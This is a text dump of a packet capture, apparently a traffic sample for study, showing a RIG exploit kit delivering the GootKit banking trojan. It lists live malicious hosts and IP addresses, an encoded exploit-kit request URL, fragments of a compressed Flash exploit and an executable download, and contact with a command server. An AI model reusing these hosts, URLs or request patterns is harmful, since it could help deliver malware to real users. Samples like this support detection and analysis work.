GootKit Banking Trojan Malware Delivered by RIG Exploit Kit EK PCAP file download traffic sample

2016-09-21 10:01:56.988869 IP 192.168.1.7.49212 > 31.184.193.179.80: Flags [P.], seq 1:282, ack 1, win 16537, length 281: HTTP: G
ET / HTTP/1.1
E..A._@…N……….<.P…’.iR.P.@…..GET / HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://www.hairaddict.fr/
x-flash-version: 19,0,0,245
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: myorderdesk.top
Connection: Keep-Alive

2016-09-21 10:01:57.203904 IP 31.184.193.179.80 > 192.168.1.7.49212: Flags [.], ack 282, win 123, length 0
E..(“.@.8.y……….P.<.iR….@P..{L…
2016-09-21 10:01:57.204021 IP 31.184.193.179.80 > 192.168.1.7.49212: Flags [.], seq 1:1351, ack 282, win 123, length 1350: HTTP: HTTP/1.1 200 OK
E..n”.@.8.tK………P.<.iR….@P..{….HTTP/1.1 200 OK
Date: Wed, 21 Sep 2016 14:02:36 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 4439
Connection: close
Content-Type: application/x-shockwave-flash

CWS     ….x..X.t.Wy.;..}IZ..lKv…cg.Z….Md=-[.-…@3wfvf……>p..&MCC.&!..K.B mHiB.@.=….9=X.=..-$”..!P(m..V..!i…………

2016-09-21 10:02:01.948239 IP 192.168.1.7.49215 > 185.117.73.233.80: Flags [P.], seq 1118:1555, ack 27790, win 16269, length 437: HTTP: GET /index.php?xXqKd7CeLB7MA4Y=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpDTrhSMaAtF-ZvGHLc-jVz0nOIQecggzxbT62lXxO9IQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_K-Qj53kKM&dfgsdf=298 HTTP/1.1
E…..@…*……uI..?.P…..3..P.?…..GET /index.php?xXqKd7CeLB7MA4Y=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpDTrhSMaAtF-ZvGHLc-jVz0nOIQecggzxbT62lXxO9IQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_K-Qj53kKM&dfgsdf=298 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: v4yw02i.c0ekkjjz.top
Connection: Keep-Alive

2016-09-21 10:02:02.152809 IP 185.117.73.233.80 > 192.168.1.7.49215: Flags [.], ack 1555, win 515, length 0
E..(..@.5….uI……P.?.3……P….J..
2016-09-21 10:02:04.257191 IP 185.117.73.233.80 > 192.168.1.7.49215: Flags [.], seq 27790:29140, ack 1555, win 515, length 1350: HTTP: HTTP/1.1 200 OK
E..n..@.5….uI……P.?.3……P…m…HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Wed, 21 Sep 2016 14:04:12 GMT
Content-Type: application/x-msdownload
Content-Length: 212992
Connection: keep-alive
Accept-Ranges: bytes

 

2016-09-21 10:02:09.452597 IP 120.114.184.49.80 > 192.168.1.7.49220: Flags [S.], seq 1684872271, ack 3876680400, win 29200, options [mss 1350,nop,wscale 7,nop,nop,sackOK], length 0
E..4..@.-.S.xr.1…..P.Ddm.O..r…r.o……F……..
2016-09-21 10:02:09.452891 IP 192.168.1.7.49220 > 120.114.184.49.80: Flags [.], ack 1, win 16537, length 0
E..(..@………xr.1.D.P..r.dm.PP.@………..
2016-09-21 10:02:09.452891 IP 192.168.1.7.49220 > 120.114.184.49.80: Flags [.], ack 1, win 16537, length 0
E..(..@………xr.1.D.P..r.dm.PP.@………..
2016-09-21 10:02:09.454382 IP 192.168.1.7.49220 > 120.114.184.49.80: Flags [P.], seq 1:124, ack 1, win 16537, length 123: HTTP
E…..@………xr.1.D.P..r.dm.PP.@..E……v…r..W….j……$…..\…Z…(.?I.a…./.5…
…..   .
.2.8…….1…………..neonbdfindcraft.win.
…………..
2016-09-21 10:02:09.454382 IP 192.168.1.7.49220 > 120.114.184.49.80: Flags [P.], seq 1:124, ack 1, win 16537, length 123: HTTP
E…..@………xr.1.D.P..r.dm.PP.@..E……v…r..W….j……$…..\…Z…(.?I.a…./.5…
…..   .
.2.8…….1…………..neonbdfindcraft.win.
…………..
2016-09-21 10:02:10.167283 IP 120.114.184.49.80 > 192.168.1.7.49220: Flags [.], ack 124, win 229, length 0
E..(.~@.-…xr.1…..P.Ddm.P..sKP… …
2016-09-21 10:02:10.167283 IP 120.114.184.49.80 > 192.168.1.7.49220: Flags [.], ack 124, win 229, length 0
E..(.~@.-…xr.1…..P.Ddm.P..sKP… …
2016-09-21 10:02:10.167352 IP 120.114.184.49.80 > 192.168.1.7.49220: Flags [P.], seq 1:1299, ack 124, win 229, length 1298: HTTP
E..:..@.-…xr.1…..P.Ddm.P..sKP….{……Y…U..W…..i.q.*.3..J{Y…..n…`…V x.J….x..x).3:&G9……u…V..j………………….V…R..O..L0..H0..0.  …_z…@0..    *.H……..0f1.0        ..U….GB1.0…U….Yorks1.0…U….York1.0…U.
..MyCompany Ltd.1.0     ..U….IT1.0…U…     localhost0…160825192527Z..260823192527Z0f1.0  ..U….GB1.0…U….Yorks1.0…U….York1.0…U.
..MyCompany Ltd.1.0     ..U….IT1.0…U…     localhost0..”0..        *.H………….0..
……<.._Qm..!….%Q.K..!..o.[4…..a)S….|…X…Y:%………..c…\.l..Z’…….5……..E.
………@.v.eux……..}3&>….M.(…….^c..s..x.a…….UVH…x.
…&..f<…..:…….F…,.#…..L……>8.mi..!….2….s..cF`..H….D…^e\…?L..1…’…..s…….0..       *.H………….4…….0…..-6.,…nY.?1…Jy…….)…sURl..9V(h…A..V….)%……{>…*9….).l…r…H……..g.Nf…).4…V..)….6~….(.TT.Acy.>2.v…..[.I.Mk..%-…………….*.K]p..w. @….#……+..\u……………V..Kx-….s..w…..m..fT…7……$/.v..8t….K…G…A………..Q6…e._…W……v……(.}.l.*S..F5.. Z:.c….W.;……..S..B.!2.}..*..Q.d………..c.m=. .>…Y2..!l.35d.#..mK..R5b……..0,_8..$+…0…G.<^..f…..VWN…%..’..!.-*……<{.ZP!.I..:?c. ..&,.\……s..}nM.6<…=.#….Y…;..!…r.B0x…2..H.&..!.
~.O*..!U6.k…H…..    !!..5m=~5..”.+.e…..>…o.T.`\….2…………